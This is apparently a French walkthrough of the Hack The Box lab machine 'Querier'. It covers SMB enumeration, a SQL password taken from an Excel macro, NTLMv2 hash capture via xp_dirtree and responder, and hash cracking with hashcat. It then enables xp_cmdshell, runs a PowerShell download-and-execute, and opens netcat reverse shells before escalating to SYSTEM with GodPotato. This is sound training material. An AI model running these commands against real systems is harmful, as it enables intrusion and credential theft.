Querier

sqlcmd impacket-mssqclient

Nom machine : Querier
Difficulté : Moyenne
OS : Windows

Enumération

NMAP

Nmap scan report for 10.10.10.125
Host is up (0.035s latency).
Not shown: 65521 closed tcp ports (conn-refused)
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-info: 
|   10.10.10.125:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-15T13:37:50
| Not valid after:  2054-11-15T13:37:50
| MD5:   292c:fb56:5425:cacb:1613:9ed8:778c:84d6
|_SHA-1: 788c:f36e:f018:95c9:b612:1291:6d51:dc42:6d89:00d0
| ms-sql-ntlm-info: 
|   10.10.10.125:1433: 
|     Target_Name: HTB
|     NetBIOS_Domain_Name: HTB
|     NetBIOS_Computer_Name: QUERIER
|     DNS_Domain_Name: HTB.LOCAL
|     DNS_Computer_Name: QUERIER.HTB.LOCAL
|     DNS_Tree_Name: HTB.LOCAL
|_    Product_Version: 10.0.17763
|_ssl-date: 2024-11-15T13:40:03+00:00; +1s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

SMB

┌──(kali㉿kali)-[~]
└─$ smbmap -H 10.10.10.125 -u '%' 

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
                                                  [*] Established 1 SMB session(s)
                                                                                                                                                      
[+] IP: 10.10.10.125:445	Name: 10.10.10.125        	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	READ ONLY	Remote IPC
	Reports                                           	READ ONLY

┌──(kali㉿kali)-[~/htb/quer]
└─$ smbclient //10.10.10.125/Reports
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Jan 28 18:23:48 2019
  ..                                  D        0  Mon Jan 28 18:23:48 2019
  Currency Volume Report.xlsm         A    12229  Sun Jan 27 17:21:34 2019

		5158399 blocks of size 4096. 826767 blocks available

smb: \> mget *
Get file Currency Volume Report.xlsm? yes
getting file \Currency Volume Report.xlsm of size 12229 as Currency Volume Report.xlsm (14.4 KiloBytes/sec) (average 14.4 KiloBytes/sec)

──(kali㉿kali)-[~/htb/quer]
└─$ file *
Currency Volume Report.xlsm: Microsoft Excel 2007+

┌──(kali㉿kali)-[~/htb/quer]
└─$ exiftool *
ExifTool Version Number         : 12.76
File Name                       : Currency Volume Report.xlsm
Directory                       : .
File Size                       : 12 kB
File Modification Date/Time     : 2024:11:15 08:40:41-05:00
File Access Date/Time           : 2024:11:15 08:41:47-05:00
File Inode Change Date/Time     : 2024:11:15 08:40:41-05:00
File Permissions                : -rw-r--r--
File Type                       : XLSM
File Type Extension             : xlsm
MIME Type                       : application/vnd.ms-excel.sheet.macroEnabled.12
Zip Required Version            : 20
Zip Bit Flag                    : 0x0006
Zip Compression                 : Deflated
Zip Modify Date                 : 1980:01:01 00:00:00
Zip CRC                         : 0x513599ac
Zip Compressed Size             : 367
Zip Uncompressed Size           : 1087
Zip File Name                   : [Content_Types].xml
Creator                         : Luis
Last Modified By                : Luis
Create Date                     : 2019:01:21 20:38:56Z
Modify Date                     : 2019:01:27 22:21:34Z
Application                     : Microsoft Excel
Doc Security                    : None
Scale Crop                      : No
Heading Pairs                   : Worksheets, 1
Titles Of Parts                 : Currency Volume
Company                         : 
Links Up To Date                : No
Shared Doc                      : No
Hyperlinks Changed              : No
App Version                     : 16.0300

Un utilisateur : Luis. Il y a également des macro.

En ouvrant le document on s'aperçoit qu'il est vide. Si on fouille les macro on obtient différentes infomrations.

conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"

┌──(kali㉿kali)-[~/htb]
└─$ sqlcmd -S QUERIER -U reporting -P 'PcwTWTHRwryjc$c6' -d volume -TrustServerCertificate -C
Sqlcmd: Error: Microsoft ODBC Driver 18 for SQL Server : Login failed for user 'reporting'..
┌──(kali㉿kali)-[~/htb]
└─$ sqlcmd -S QUERIER -U luis -P 'PcwTWTHRwryjc$c6' -d volume -TrustServerCertificate -C
Sqlcmd: Error: Microsoft ODBC Driver 18 for SQL Server : Login failed for user 'luis'..

Sans résultat

┌──(kali㉿kali)-[~]
└─$ impacket-mssqlclient QUERIER/reporting:'PcwTWTHRwryjc$c6'@QUERIER -dc-ip 10.10.10.125 -windows-auth
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands

Cela fonctionne.

Accès initial

Nous n'avons rien d'intéressant dans les db. Nous allons tenter d'obtenir un hash à l'aide de responder.

SQL (QUERIER\reporting  reporting@volume)> exec master.dbo.xp_dirtree "\\10.10.14.19\users.txt"
subdirectory   depth   
------------   -----

┌──(kali㉿kali)-[~/htb/quer]
└─$ sudo responder -I tun0  

[SMB] NTLMv2-SSP Client   : 10.10.10.125
[SMB] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMB] NTLMv2-SSP Hash     : mssql-svc::QUERIER:c92780f89740ead1:3CF96A9188AE69F6E6F62B25FA1C88D7:0101000000000000808C230A4337DB010A06866AE2CC9BFB00000000020008004400470056004F0001001E00570049004E002D004D0056004D003500430057004D004D0031005400310004003400570049004E002D004D0056004D003500430057004D004D003100540031002E004400470056004F002E004C004F00430041004C00030014004400470056004F002E004C004F00430041004C00050014004400470056004F002E004C004F00430041004C0007000800808C230A4337DB0106000400020000000800300030000000000000000000000000300000286D7A358EB17707BB81D45738CC72C496A84BEB95D7749BD5735D9BF86565E60A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0031003900000000000000000000000000

Nous pouvons cracker le hash à l'aide d'hashcat

┌──(kali㉿kali)-[~/htb/quer]
└─$ cat hash.txt                                         
mssql-svc::QUERIER:c92780f89740ead1:3CF96A9188AE69F6E6F62B25FA1C88D7:0101000000000000808C230A4337DB010A06866AE2CC9BFB00000000020008004400470056004F0001001E00570049004E002D004D0056004D003500430057004D004D0031005400310004003400570049004E002D004D0056004D003500430057004D004D003100540031002E004400470056004F002E004C004F00430041004C00030014004400470056004F002E004C004F00430041004C00050014004400470056004F002E004C004F00430041004C0007000800808C230A4337DB0106000400020000000800300030000000000000000000000000300000286D7A358EB17707BB81D45738CC72C496A84BEB95D7749BD5735D9BF86565E60A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0031003900000000000000000000000000
┌──(kali㉿kali)-[~/htb/quer]
└─$ hashcat -h | grep NTLM
   5500 | NetNTLMv1 / NetNTLMv1+ESS                                  | Network Protocol
  27000 | NetNTLMv1 / NetNTLMv1+ESS (NT)                             | Network Protocol
   5600 | NetNTLMv2                                                  | Network Protocol
  27100 | NetNTLMv2 (NT)                                             | Network Protocol
   1000 | NTLM                                                       | Operating System
┌──(kali㉿kali)-[~/htb/quer]
└─$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

{...}

MSSQL-SVC::QUERIER:c92780f89740ead1:3cf96a9188ae69f6e6f62b25fa1c88d7:0101000000000000808c230a4337db010a06866ae2cc9bfb00000000020008004400470056004f0001001e00570049004e002d004d0056004d003500430057004d004d0031005400310004003400570049004e002d004d0056004d003500430057004d004d003100540031002e004400470056004f002e004c004f00430041004c00030014004400470056004f002e004c004f00430041004c00050014004400470056004f002e004c004f00430041004c0007000800808c230a4337db0106000400020000000800300030000000000000000000000000300000286d7a358eb17707bb81d45738cc72c496a84beb95d7749bd5735d9bf86565e60a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0031003900000000000000000000000000:corporate568

mssql-svc:corporate568

Nous allons maintenant nous connecter à l'aide de ce compte.

┌──(kali㉿kali)-[~]
└─$ impacket-mssqlclient QUERIER/mssql-svc:'corporate568'@QUERIER -dc-ip 10.10.10.125 -windows-auth
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies 

SQL (QUERIER\mssql-svc  dbo@master)> enable_xp_cmdshell
INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.

SQL (QUERIER\mssql-svc  dbo@master)> xp_cmdshell whoami
output              
-----------------   
querier\mssql-svc   

NULL

Nous allons obtenir un reverse shell.

Dans un premier temps, nous allons télécharger un script ps1 que nous allons modifier avec notre adresse IP et le port d'écoute.

PowerShell-reverse-shell/powershell-reverse-shell.ps1 at main · martinsohn/PowerShell-reverse-shellGitHub

On lance ensuite un server python puis lançons un listeneur netcat puis cette commande :

SQL (QUERIER\mssql-svc  dbo@master)> EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.19:80/rev.ps1") | powershell -noprofile'

┌──(kali㉿kali)-[~/htb/quer]
└─$ nc -lnvp 1234                                  
listening on [any] 1234 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.125] 49682
SHELL> whoami
querier\mssql-svc

Elévation des privilèges

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

SeImpersonatePrivilege ...

SHELL> iwr -uri http://10.10.14.19:80/Tools/GodPotato.exe -Outfile god.exe
SHELL> iwr -uri http://10.10.14.19:80/Tools/nc.exe -Outfile nc.exe
SHELL> ./god.exe -cmd 'cmd /c C:\users\mssql-svc\desktop\nc.exe 10.10.14.19 1234 -e cmd'

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234                    
listening on [any] 1234 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.125] 49688
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\users\mssql-svc\desktop> whoami
whoami
nt authority\system

PrécédentNetmon SuivantLinux

Mis à jour il y a 1 an

hashtagEnumération

hashtagNMAP

hashtagSMB

hashtagAccès initial

hashtagElévation des privilèges

Enumération

NMAP

SMB

Accès initial

Elévation des privilèges